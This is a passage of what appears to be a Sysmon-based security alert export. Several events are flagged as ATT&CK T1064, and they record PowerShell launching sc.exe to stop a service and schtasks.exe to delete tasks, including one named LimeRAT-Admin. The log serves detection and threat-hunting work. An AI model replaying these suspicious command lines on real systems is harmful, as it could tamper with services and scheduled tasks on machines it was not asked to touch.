+ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010e7002e00} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.501838100Z"",""eventRecordID"":""3350"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.498\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010e7002e00}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.498"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010e7002e00}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", 
+"May 29, 2020 @ 14:20:05.179",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.799 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100a142c00} +ProcessId: 1380 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.828694000Z"",""eventRecordID"":""3341"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.799\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100a142c00}\r\nProcessId: 1380\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.799"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00100a142c00}"",""processId"":""1380"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.149",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.757 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bc112c00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.763241600Z"",""eventRecordID"":""3340"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.757\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bc112c00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.757"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010bc112c00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.139",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.711 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010280f2c00} +ProcessId: 7088 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.713351800Z"",""eventRecordID"":""3339"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.711\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010280f2c00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s 
-NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.711"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010280f2c00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.117",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.688 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b90c2c00} +ProcessId: 7628 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.691194700Z"",""eventRecordID"":""3338"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.688\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b90c2c00}\r\nProcessId: 7628\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.688"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b90c2c00}"",""processId"":""7628"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.083",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.665 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010c70a2c00} +ProcessId: 6348 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.667261600Z"",""eventRecordID"":""3337"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.665\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010c70a2c00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.665"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010c70a2c00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
